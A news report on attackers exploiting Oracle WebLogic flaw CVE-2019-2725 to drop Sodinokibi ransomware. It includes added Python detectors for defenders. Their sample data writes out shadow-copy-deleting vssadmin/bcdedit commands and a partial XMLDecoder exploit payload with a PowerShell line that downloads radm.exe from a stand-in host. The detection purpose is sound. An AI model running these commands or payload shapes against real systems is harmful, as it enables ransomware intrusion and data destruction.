Attackers now exploiting critical Oracle WebLogic Server flaw to install new 'Sodinokibi' ransomware

WebLogic Server vulnerability first discovered earlier this month by security researchers at Knownsec 404

Attackers are exploiting a critical deserialisation vulnerability in Oracle WebLogic Server, tracked as CVE-2019-2725 and still a zero-day when the attacks began, to install a new ransomware family, dubbed Sodinokibi, on internet-facing servers.

The flaw was first disclosed earlier this month by security researchers at Knownsec 404. It lets an unauthenticated attacker send a crafted XML request to the server's wls9_async_response and wls-wsat web service components, which pass the attacker-controlled content to java.beans.XMLDecoder and instantiate the Java objects it describes, giving the attacker remote command execution and full control of the server. According to the researchers, every WebLogic version shipping those components was affected; Oracle's alert lists 10.3.6.0.0 and 12.1.3.0.0 as the affected supported releases.

On 26th April, Oracle released an out-of-band Security Alert patch to address the vulnerability.

"Due to the severity of this vulnerability, Oracle recommends that this Security Alert be applied as soon as possible," said Eric Maurice, director of security assurance at Oracle, in a blog post.

Now researchers at Cisco Talos have found that attackers have already exploited the vulnerability to install malware including botnet agents, cryptocurrency miners and ransomware.

Talos first noticed the new ransomware on 25th April, the day before Oracle's patch, when attackers made an HTTP connection to a vulnerable Oracle WebLogic server.

So far, the researchers have seen two ransomware families deployed through the flaw, Sodinokibi and GandCrab.

Sodinokibi encrypts the files in the user's directories on the infected machine and appends a random extension that is unique to each machine. It also deletes the volume shadow copies, the snapshots Windows would otherwise use to restore earlier versions of the files, so that recovery without the attackers' key is much harder.
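That recovery-inhibition step is one of the more dependable things to detect on the host, because the commands involved are almost never run by legitimate administration in that combination. The following is an added example, not code from the article or from Talos: a small Python detector that runs over process-creation records in a hypothetical three-field format (event id, image path, command line; not a real Sysmon or EDR schema) and reports which recovery-inhibiting commands each record contains. The chained vssadmin/bcdedit command line in the sample is the form widely reported for this family; the event schema and the sample events are constructed.

```python
import re
from typing import Iterable, List, Tuple

# Command-line patterns that remove or disable Windows recovery mechanisms.
# Case-insensitive; tolerate an optional ".exe", a closing quote after the
# image name and arbitrary whitespace, since all three vary between samples.
RECOVERY_INHIBITION_RULES = {
    "shadow_copy_delete_vssadmin": re.compile(
        r'vssadmin(?:\.exe)?"?\s+delete\s+shadows', re.I),
    "shadow_copy_delete_wmic": re.compile(
        r'wmic(?:\.exe)?"?\s+shadowcopy\s+delete', re.I),
    "recovery_disabled_bcdedit": re.compile(
        r'bcdedit(?:\.exe)?"?\s+/set\s+\{default\}\s+recoveryenabled\s+no', re.I),
    "bootstatus_ignored_bcdedit": re.compile(
        r'bcdedit(?:\.exe)?"?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures', re.I),
    "backup_catalog_delete_wbadmin": re.compile(
        r'wbadmin(?:\.exe)?"?\s+delete\s+catalog', re.I),
}


def match_rules(command_line: str) -> List[str]:
    """Names of every rule the command line triggers, alphabetically."""
    return sorted(name for name, rx in RECOVERY_INHIBITION_RULES.items()
                  if rx.search(command_line))


def scan_events(events: Iterable[Tuple[str, str, str]]) -> List[Tuple[str, List[str]]]:
    """events: (event_id, image_path, command_line) triples (hypothetical schema).

    Returns (event_id, matched_rules) for each event that triggers at least one
    rule. One chained command line ("a & b & c") can trigger several rules at
    once, which is itself a strong signal: deleting shadow copies and disabling
    recovery in a single step is ransomware behaviour, not administration.
    """
    hits = []
    for event_id, _image, cmd in events:
        rules = match_rules(cmd)
        if rules:
            hits.append((event_id, rules))
    return hits


# Constructed sample events (not real telemetry). evt-2 is the chain this
# family runs after encryption; evt-1 and evt-3 are benign look-alikes.
SAMPLE_EVENTS = [
    ("evt-1", r"C:\Windows\System32\vssadmin.exe", "vssadmin list shadows"),
    ("evt-2", r"C:\Windows\System32\cmd.exe",
     'cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet '
     '& bcdedit /set {default} recoveryenabled No '
     '& bcdedit /set {default} bootstatuspolicy ignoreallfailures'),
    ("evt-3", r"C:\Windows\System32\bcdedit.exe", "bcdedit /enum"),
    ("evt-4", r"C:\Windows\System32\wbem\WMIC.exe",
     "WMIC.exe shadowcopy delete /nointeractive"),
]

if __name__ == "__main__":
    for event_id, rules in scan_events(SAMPLE_EVENTS):
        print(event_id, ", ".join(rules))
```

The rules match on the command line rather than the image path because the commands are usually launched through cmd.exe or PowerShell, as in evt-2, where the parent image tells you nothing. Attackers can still rename binaries or split the chain across processes, so treat a hit as a high-priority alert to correlate with file-rename volume rather than as a complete detection.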

Sodinokibi needs no user interaction to infect a system, because the attackers use the flaw to make the targeted server download and run a copy of the ransomware itself.

In one instance, after finding a vulnerable server, the attackers sent it an HTTP POST request containing a PowerShell command. That command downloaded a file named "radm.exe", the ransomware payload, saved it on the machine and executed it.
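That request is what a web-tier detection should be looking for, and it has a recognisable shape. The following is an added example, not code from the article, from Talos or from Oracle: a Python classifier for WebLogic requests that flags traffic to the two components carrying CVE-2019-2725 and grades it by the XMLDecoder markers and the shell or download commands found in the body. The path prefixes (/_async/ and /wls-wsat/) come from Oracle's alert and the public analyses rather than from this article; the request records and the payload fragment are constructed, and the fragment is deliberately incomplete.

```python
import re
from typing import List, Tuple

# URL prefixes served by the components that carry CVE-2019-2725
# (wls9_async_response.war and wls-wsat.war). Oracle's alert lists these
# paths for access restriction; the article above does not name them.
VULNERABLE_PREFIXES = ("/_async/", "/wls-wsat/")

# Markers of the exploit shape: a WorkContext SOAP header carrying
# java.beans.XMLDecoder markup that instantiates arbitrary classes.
DESERIALISATION_MARKERS = {
    "work_context": re.compile(r"<\s*(?:\w+:)?WorkContext\b", re.I),
    "xmldecoder_java": re.compile(
        r"<\s*java\b[^>]*\bclass\s*=\s*[\"']java\.beans\.XMLDecoder", re.I),
    "void_class": re.compile(r"<\s*void\b[^>]*\bclass\s*=", re.I),
    "process_exec": re.compile(r"java\.lang\.ProcessBuilder|java\.lang\.Runtime", re.I),
}

# Markers of a dropper chain of the kind the article describes.
COMMAND_MARKERS = {
    "powershell": re.compile(r"\bpowershell\b", re.I),
    "cmd_shell": re.compile(r"\bcmd(?:\.exe)?\s+/c\b", re.I),
    "certutil": re.compile(r"\bcertutil\b", re.I),
    "downloader": re.compile(
        r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b", re.I),
}


def classify_request(path: str, body: str) -> Tuple[str, List[str]]:
    """Grade one request. Returns (verdict, matched_marker_names).

    'none'                         not aimed at the vulnerable components
    'vulnerable_endpoint_access'   hits /_async/ or /wls-wsat/ but carries no
                                   XMLDecoder markup (a WorkContext header on
                                   its own is legitimate WebLogic SOAP traffic)
    'exploit_attempt'              XMLDecoder markup inside the request
    'exploit_attempt_with_command' ... and a shell or download command in it
    """
    if not path.startswith(VULNERABLE_PREFIXES):
        return "none", []
    hits = [n for n, rx in DESERIALISATION_MARKERS.items() if rx.search(body)]
    decoder_hits = [h for h in hits if h != "work_context"]
    if not decoder_hits:
        return "vulnerable_endpoint_access", hits
    cmd_hits = [n for n, rx in COMMAND_MARKERS.items() if rx.search(body)]
    if cmd_hits:
        return "exploit_attempt_with_command", hits + cmd_hits
    return "exploit_attempt", hits


def scan_requests(requests) -> List[Tuple[str, str]]:
    """requests: (request_id, path, body) tuples -> [(request_id, verdict)]."""
    return [(rid, classify_request(p, b)[0]) for rid, p, b in requests]


# Constructed, deliberately incomplete payload fragment carrying the markers
# of a CVE-2019-2725 request; it is not a working exploit.
EXPLOIT_FRAGMENT = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.8.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="2"><string>powershell -c "(New-Object Net.WebClient).DownloadFile('http://example.invalid/radm.exe','radm.exe')"</string></void>
          </array>
          ...
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# Constructed benign async call: WorkContext header, no XMLDecoder markup.
BENIGN_ASYNC = """<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">AAAA</work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>"""

# Constructed blind probe: XMLDecoder markup that only sleeps, no command.
SLEEP_PROBE = """<soapenv:Envelope><soapenv:Header>
  <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    <java class="java.beans.XMLDecoder"><void class="java.lang.Thread" method="sleep"><long>5000</long></void></java>
  </work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>"""

SAMPLE_REQUESTS = [
    ("req-1", "/console/login/LoginForm.jsp", ""),
    ("req-2", "/_async/AsyncResponseService", BENIGN_ASYNC),
    ("req-3", "/wls-wsat/CoordinatorPortType", SLEEP_PROBE),
    ("req-4", "/_async/AsyncResponseService", EXPLOIT_FRAGMENT),
]

if __name__ == "__main__":
    for rid, path, body in SAMPLE_REQUESTS:
        print(rid, *classify_request(path, body))
```

Prefix matching is deliberate: wls-wsat exposes several endpoints, so a list of exact paths would miss some. The body signatures are triage, not proof; the same effect can be reached through other XMLDecoder constructs and with different namespace prefixes or entity encoding, so treat every 'exploit_attempt' hit against an unpatched server as a compromise to investigate, and rely on the patch or on removing the components rather than on the signatures.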

According to the researchers, once Sodinokibi has encrypted a machine it drops a ransom note demanding payment in exchange for the decryption key. The note contains links to a payment site and a key unique to the victim.

When victims visit the payment site, they are asked to enter that key and the file extension the ransomware used. Once those details are entered, they are shown the ransom amount (around $2,500), a bitcoin address to pay it to and a deadline; if the deadline is missed, the ransom doubles. Talos also observed the same attackers returning to the servers they had compromised and deploying a second ransomware family, GandCrab, roughly eight hours after Sodinokibi.

Once the payment is made and confirmed on the blockchain, the attackers provide a link to download the decryption key.

The researchers believe the attacks on Oracle's WebLogic servers will increase in coming days.

"Due to the ubiquity of Oracle WebLogic servers and the ease of exploitation of this vulnerability, Talos expects widespread attacks involving CVE-2019-2725," the researchers said in a blog post.

They advise server owners to apply Oracle's patch to protect their machines from further attacks. Where patching has to wait, the widely published workaround is to remove the wls9_async_response.war and wls-wsat.war components and restart the server, or to block external access to the /_async/* and /wls-wsat/* paths; in either case, access logs should be reviewed for POST requests to those paths made before the fix went in, since a server that was exposed for any length of time may already be compromised.
